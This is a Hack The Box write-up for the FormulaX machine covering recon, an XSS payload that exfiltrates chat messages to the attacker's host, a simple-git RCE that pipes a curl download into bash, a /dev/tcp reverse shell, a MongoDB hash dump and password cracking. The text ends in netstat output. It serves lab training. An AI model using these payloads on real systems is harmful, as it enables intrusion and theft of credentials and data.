HTB FormulaX

HTB_FormulaX
📄 IP Address: 10.10.11.6
Host: formulax.htb
🍽️🍽️ Table of contents

Table of contents
ℹ️Recon
Website
nmapAutomator
👣Foothold
#️⃣Privilege Escalation
🚩Root Access
ℹ️Recon
First of all, let's look into the website
Website
http://formulax.htb
HTB_FormulaX 1
On the website we can notice that the host redirects the URL to
http://formulax.htb/static/index.html which seems to be a login page. There is an option to
create an account. So, let's create one.
Since the registration was successful lets login and check the site.
HTB_FormulaX 2
HTB_FormulaX 3
I submitted a query “Tell me about yourself” And it responded with
Let's do a detailed analysis of the network using nmapAutomator
nmapAutomator
└─# nmapAutomator.sh -H formulax.htb -t All
Running all scans on formulax.htb with IP 3(NXDOMAIN)
No ping detected.. Will not use ping scans!
Host is likely running Unknown OS!
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE

22/tcp open ssh
80/tcp open http
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA)
HTB_FormulaX 4
|_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-cors: GET POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS Detection modified to: Linux
---------------------Starting Full Scan------------------------
PORT STATE SERVICE

22/tcp open ssh
80/tcp open http
4345/tcp open m4-network-as
Making a script scan on extra ports: 4345

4345/tcp open tcpwrapped
----------------------Starting UDP Scan------------------------
No UDP ports are open
---------------------Starting Vulns Scan-----------------------
Running CVE scan on all ports
HTB_FormulaX 5
Running Vuln scan on all ports

This may take a while, depending on the number of detected services..

| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://www.securityfocus.com/bid/49303
| https://www.tenable.com/plugins/nessus/55976
|_ https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=formulax.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://formulax.htb:80/
| Form id: email
| Form action: javascript:handleRequest()
|
| Path: http://formulax.htb:80/static/register.html
| Form id: name
| Form action: javascript:handleRegisterRequest()
|
| Path: http://formulax.htb:80/static/index.html
| Form id: email
|_ Form action: javascript:handleRequest()
HTB_FormulaX 6
| http-enum:
| /admin/: Possible admin folder
| /admin/admin/: Possible admin folder
| /admin/account.php: Possible admin folder
| /admin/index.php: Possible admin folder
| /admin/login.php: Possible admin folder
| /admin/admin.php: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/home.php: Possible admin folder
| /admin/controlpanel.php: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/cp.php: Possible admin folder
| /admin/admin_login.php: Possible admin folder
| /admin/admin-login.php: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/adminLogin.php: Possible admin folder
| /admin/account.cfm: Possible admin folder
| /admin/index.cfm: Possible admin folder
| /admin/login.cfm: Possible admin folder
| /admin/admin.cfm: Possible admin folder
| /admin/admin_login.cfm: Possible admin folder
| /admin/controlpanel.cfm: Possible admin folder
| /admin/cp.cfm: Possible admin folder
| /admin/adminLogin.cfm: Possible admin folder
| /admin/admin-login.cfm: Possible admin folder
| /admin/home.cfm: Possible admin folder
| /admin/account.asp: Possible admin folder
| /admin/index.asp: Possible admin folder
| /admin/login.asp: Possible admin folder
| /admin/admin.asp: Possible admin folder
| /admin/home.asp: Possible admin folder
| /admin/controlpanel.asp: Possible admin folder
| /admin/admin-login.asp: Possible admin folder
| /admin/cp.asp: Possible admin folder
| /admin/admin_login.asp: Possible admin folder
| /admin/adminLogin.asp: Possible admin folder
| /admin/account.aspx: Possible admin folder
| /admin/index.aspx: Possible admin folder
| /admin/login.aspx: Possible admin folder
| /admin/admin.aspx: Possible admin folder
| /admin/home.aspx: Possible admin folder
| /admin/controlpanel.aspx: Possible admin folder
| /admin/admin-login.aspx: Possible admin folder
HTB_FormulaX 7
| /admin/cp.aspx: Possible admin folder
| /admin/admin_login.aspx: Possible admin folder
| /admin/adminLogin.aspx: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /Admin/: Possible admin folder
| /admin/backup/: Possible backup
| /admin/download/backup.sql: Possible database backup
| /admin/upload.php: Admin File Upload
| /admin/CiscoAdmin.jhtml: Cisco Collaboration Server
| /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/
FCKeditor File upload
| /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/F
CKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FC
Keditor File Upload
| /admin/jscript/upload.php: Lizard Cart/Remote File upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
| /admin/jscript/upload.pl: Lizard Cart/Remote File upload
| /admin/jscript/upload.asp: Lizard Cart/Remote File upload
| /admin/environment.xml: Moodle files
|_ /logout/: Potentially interesting folder
---------------------Finished all scans------------------------
Completed in 32 minute(s) and 40 second(s)
There is nothing eye-catching other than the port 4345 . Let's do directory enumeration.
└─# dirsearch -u http://formulax.htb/restricted

/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resou
rces is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.ht
ml
from pkg_resources import DistributionNotFound, VersionConflict
HTB_FormulaX 8
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size:
11460
Output File: /HTB/reports/http_formulax.htb/_restricted_24-03-16_00-16-57.txt
Target: http://formulax.htb/
[00:16:57] Starting: restricted/

[00:17:38] 200 - 46B - /restricted/about.html
[00:18:37] 200 - 46B - /restricted/chat.html
[00:18:37] 200 - 1KB - /restricted/chat.js
[00:18:45] 200 - 46B - /restricted/contact_us.html
[00:18:45] 200 - 1KB - /restricted/contact_us.js
[00:19:15] 200 - 46B - /restricted/home.html
Task Completed
The only interesting thing we see is the restricted/contact_us.html directory which we can
directly contact with Admin
There seems to be a possibility to XSS via this form. Let's verify it.
<img src=x >
HTB_FormulaX 9
We seem to be able to upload files from our Kali to the Machine.
👣Foothold
Since we can upload files into the machine via XSS , we can create a payload to exploit
this.
const script = document.createElement('script');

script.src = '/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function() {
const res = axios.get(`/user/api/chat`);
const socket = io('/',{withCredentials: true});
socket.on('message', (my_message) => {
fetch("http://10.10.14.68:5551/?d=" + btoa(my_message))
});
socket.emit('client_message', 'history');
});
HTB_FormulaX 10
This payload script sets up a real-time connection to a server, listens for message events
from the server, and sends a GET request to a specified URL whenever a ‘message’ event is
received. It also sends a client_message event with the data history to the server.
<img src=x script1=document.createElement('script');script1.src='http://1

0.10.14.68:5551/payload.js';document.head.appendChild(script1);"/>
└─# php -S 0.0.0.0:5551

[Sat Mar 16 01:34:55 2024] PHP 8.2.12 Development Server (http://0.0.0.0:5551) started
[Sat Mar 16 01:36:01 2024] 10.10.11.6:54876 Accepted
[Sat Mar 16 01:36:01 2024] 10.10.11.6:54876 [200]: GET /payload.js
[Sat Mar 16 01:36:01 2024] 10.10.11.6:54876 Closing
[Sat Mar 16 01:36:02 2024] 10.10.11.6:54888 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54890 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54890 [404]: OPTIONS /?d=R3JlZXRpbmdzIS4gSG93IGNh
biBpIGhlbHAgeW91IHRvZGF5ID8uIFlvdSBjYW4gdHlwZSBoZWxwIHRvIHNlZSBzb21lIGJ1aWxkaW4gY29tbWF
uZHM= - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54890 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54906 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54926 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54906 [404]: OPTIONS /?d=SGVsbG8sIEkgYW0gQWRtaW4u
VGVzdGluZyB0aGUgQ2hhdCBBcHBsaWNhdGlvbg== - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54926 [404]: OPTIONS /?d=V3JpdGUgYSBzY3JpcHQgZm9y
ICBkZXYtZ2l0LWF1dG8tdXBkYXRlLmNoYXRib3QuaHRiIHRvIHdvcmsgcHJvcGVybHk= - No such file or
directory
HTB_FormulaX 11
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54906 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54926 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 [404]: OPTIONS /?d=V3JpdGUgYSBzY3JpcHQgdG8g
YXV0b21hdGUgdGhlIGF1dG8tdXBkYXRl - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 [404]: OPTIONS /?d=TWVzc2FnZSBTZW50Ojxicj5o
aXN0b3J5 - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 Closing
We got Base64 string and let's convert them.
Greetings!. How can i help you today ?. You can type help to see some
buildin commands
Hello, I am Admin.Testing the Chat Application
Write a script for
dev-git-auto-update.chatbot.htb to work properly
Write a script to automate the auto-update
Message Sent:<br>history
Here from the decoded message, we got a subdomain. Let's add it to hosts and check the
site.
HTB_FormulaX 12
At the bottom we can notice that this page is built using simple-git v3.14 . Upon further
research I came to know that this version has vulnerability
Remote Code Execution (RCE) in simple-git | CVE-2022-25912 | Snyk

High severity (8.1) Remote Code Execution (RCE) in simple-git | CVE-2022-
25912
https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221
Let's Exploit this vulnerability. First of all, let's create a shell file called shell.sh .
/bin/bash -i >& /dev/tcp/10.10.14.68/5550 0>&1
Now directly enter this command in the input box
ext::sh -c curl% http://10.10.14.68:5551/shell.sh|bash
HTB_FormulaX 13
#️⃣Privilege Escalation
Through a thorough search, it was found that the target machine has a mongoDB .
www-data@formulax:/var/lib$ ls -la
total 152
drwxr-xr-x 38 root root 4096 Feb 20 16:16 .
drwxr-xr-x 14 root root 4096 Feb 20 16:16 ..
drwxr-xr-x 2 root root 4096 Jun 7 2023 PackageKit
drwxr-xr-x 3 root root 4096 Jun 7 2023 apport
drwxr-xr-x 5 root root 4096 Mar 5 09:57 apt
drwxr-xr-x 2 root root 4096 Jul 22 2023 aspell
drwxr-xr-x 8 root root 4096 Jan 30 07:56 cloud
drwxr-xr-x 2 root root 4096 Jun 7 2023 dbus
drwxr-xr-x 2 root root 4096 Feb 16 15:13 dhcp
drwxr-xr-x 3 root root 4096 Jul 22 2023 dictionaries-common
drwxr-xr-x 7 root root 4096 Mar 5 09:57 dpkg
drwxr-xr-x 3 root root 4096 Jul 22 2023 emacsen-common
drwxr-xr-x 4 root root 4096 Jun 15 2023 ghostscript
drwxr-xr-x 2 root root 4096 Apr 26 2023 git
drwxr-xr-x 4 root root 4096 Jun 7 2023 grub
drwxr-xr-x 2 root root 4096 Jul 22 2023 ispell
drwxr-xr-x 3 root root 4096 Jul 22 2023 libreoffice
drwxr-xr-x 2 root root 4096 Jul 22 2023 man-db
drwxr-xr-x 2 root root 4096 Apr 18 2022 misc
drwxr-xr-x 4 mongodb mongodb 4096 Mar 15 21:07 mongodb
drwxr-xr-x 6 mysql mysql 4096 Mar 15 19:26 mysql
drwxr-xr-x 7 root root 4096 Jun 11 2023 nginx
drwxr-xr-x 2 root root 4096 Mar 24 2022 os-prober
drwxr-xr-x 2 root root 4096 Feb 19 15:36 pam
drwxr-xr-x 4 root root 4096 Jun 15 2023 php
drwxr-xr-x 2 root root 4096 Mar 18 2022 plymouth
drwx------ 3 root root 4096 Feb 17 2023 polkit-1
drwx------ 2 root root 4096 Feb 17 2023 private
drwxr-xr-x 2 root root 4096 Feb 17 2023 python
-rw-r--r-- 1 root root 0 Feb 17 2023 shells.state
drwxr-xr-x 3 Debian-snmp Debian-snmp 4096 Feb 20 16:16 snmp
drwxr-xr-x 3 root root 4096 Feb 17 2023 sudo
drwxr-xr-x 12 root root 4096 Feb 19 13:36 systemd
drwxr-xr-x 2 root root 4096 Mar 16 2022 ubuntu-drivers-common
drwxr-xr-x 2 root root 4096 Feb 19 16:05 ubuntu-release-upgrader
drwxr-xr-x 3 root root 4096 Jan 30 08:03 ucf
drwxr-xr-x 2 root root 4096 Feb 10 2023 update-notifier
HTB_FormulaX 14
drwxr-xr-x 2 root root 4096 Mar 9 2022 upower
drwxr-xr-x 3 root root 4096 Jan 30 08:05 vmware
Let's enter mongoDB directly to enter the database.
www-data@formulax:/tmp$ mongo
MongoDB shell version v4.4.29
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongod
b
Implicit session: session { "id" : UUID("74bb87f6-dc6a-41e2-afc2-fcb552d528cd") }
MongoDB server version: 4.4.8
---
The server generated these startup warnings when booting:
2024-03-15T19:26:23.021+00:00: Using the XFS filesystem is strongly recommended
with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesy
stem
2024-03-15T19:26:24.573+00:00: Access control is not enabled for the database.
Read and write access to data and configuration is unrestricted
---
> show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
testing 0.000GB
> use testing
switched to db testing
> show collections
messages
users
> db.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chat
bot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.",
"terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR
5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTA1MzczODV9.
2YCy-Qfh_uk_pb55k9-7jygxfhiXsbfJP65fLGDTuvM", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "fran
k_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7
s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
Here we got the hash password of user frank. Let's crack it via Johntheripper
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
HTB_FormulaX 15
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:07 DONE (2024-03-16 02:53) 0.1305g/s 375.9p/s 375.9c/s 375.9C/s onlyme..socc
er9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now let's try to connect via shh connection.
And finally, I got the user flag.
Entering sudo -l fails to view the privilege escalation information. Then check the
background port.
frank_dorky@formulax:~$ sudo -l
[sudo] password for frank_dorky:
Sorry, user frank_dorky may not run sudo on forumlax.
frank_dorky@formulax:~$ netstat -avn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:8082 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:44139 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN
HTB_FormulaX 16
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:37191 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:80 127.0.0.1:41900 TIME_WAIT
tcp 0 0 127.0.0.1:51146 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55766 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55776 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:46610 ESTABLISHED
tcp 0 0 127.0.0.1:55194 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45806 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:58790 127.0.0.1:80 ESTABLISHED
tcp 0 0 127.0.0.1:55174 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45882 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40454 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55162 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51186 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43466 TIME_WAIT
tcp 0 0 127.0.0.1:40444 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35896 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:45852 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55672 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56238 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:43462 TIME_WAIT
tcp 0 0 127.0.0.1:51268 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55748 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55136 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45840 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46204 127.0.0.1:44139 ESTABLISHED
tcp 0 0 127.0.0.1:3000 127.0.0.1:41684 ESTABLISHED
tcp 0 0 127.0.0.1:40566 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55844 127.0.0.1:8082 TIME_WAIT
tcp 0 52 10.10.11.6:22 10.10.14.68:46246 ESTABLISHED
tcp 0 0 127.0.0.1:45910 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40652 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35880 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:51088 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51284 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:36148 127.0.0.1:80 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:43720 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55804 TIME_WAIT
tcp 0 0 127.0.0.1:55688 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55124 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45912 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51228 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40538 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40536 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51176 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45936 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43526 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35862 127.0.0.1:3000 TIME_WAIT
HTB_FormulaX 17
tcp 0 0 127.0.0.1:45758 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43618 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43732 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55102 TIME_WAIT
tcp 0 0 127.0.0.1:55122 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56048 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:43762 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45796 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51178 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51324 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55784 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43714 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40606 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35878 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:45900 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55632 TIME_WAIT
tcp 0 0 127.0.0.1:40550 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56048 ESTABLISHED
tcp 0 0 127.0.0.1:35908 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:55876 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56238 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:55906 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:46016 TIME_WAIT
tcp 0 0 127.0.0.1:40622 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55052 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51128 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45834 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55640 TIME_WAIT
tcp 0 0 127.0.0.1:43446 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51138 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43730 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40594 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40502 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45868 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40436 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51248 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55920 TIME_WAIT
tcp 0 0 127.0.0.1:51068 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:45816 TIME_WAIT
tcp 0 0 127.0.0.1:55664 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55230 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55066 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55694 TIME_WAIT
tcp 0 0 127.0.0.1:44139 127.0.0.1:46204 ESTABLISHED
tcp 0 0 127.0.0.1:40684 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55076 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43642 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:45968 TIME_WAIT
tcp 0 0 127.0.0.1:45772 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:58790 ESTABLISHED
HTB_FormulaX 18
tcp 0 0 127.0.0.1:43496 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:37191 127.0.0.1:57480 ESTABLISHED
tcp 0 0 127.0.0.1:45952 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55820 TIME_WAIT
tcp 0 0 127.0.0.1:55184 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51310 TIME_WAIT
tcp 0 0 127.0.0.1:46036 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45792 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55684 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43480 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45956 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51160 TIME_WAIT
tcp 0 0 127.0.0.1:43786 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:58438 TIME_WAIT
tcp 0 0 127.0.0.1:40518 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40496 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:36134 ESTABLISHED
tcp 0 0 127.0.0.1:43672 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55728 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:40670 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:40468 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56254 ESTABLISHED
tcp 0 0 127.0.0.1:43576 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:36148 ESTABLISHED
tcp 0 0 127.0.0.1:45890 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35870 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:55248 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40434 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55788 TIME_WAIT
tcp 0 0 127.0.0.1:55134 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43660 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43530 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:55842 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55630 TIME_WAIT
tcp 0 0 127.0.0.1:45916 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55210 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40610 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56244 ESTABLISHED
tcp 0 0 127.0.0.1:55708 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43456 TIME_WAIT
tcp 0 0 127.0.0.1:46000 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51246 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43544 TIME_WAIT
tcp 0 0 127.0.0.1:55894 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51258 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55720 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40636 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43630 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56852 127.0.0.1:27017 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51198 TIME_WAIT
HTB_FormulaX 19
tcp 0 0 127.0.0.1:59512 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:55836 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43450 127.0.0.1:8082 TIME_WAIT
tcp 0 1 10.10.11.6:33170 8.8.8.8:53 SYN_SENT
tcp 0 0 127.0.0.1:43518 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45968 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55670 TIME_WAIT
tcp 0 0 127.0.0.1:43688 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43614 127.0.0.1:8082 TIME_WAIT
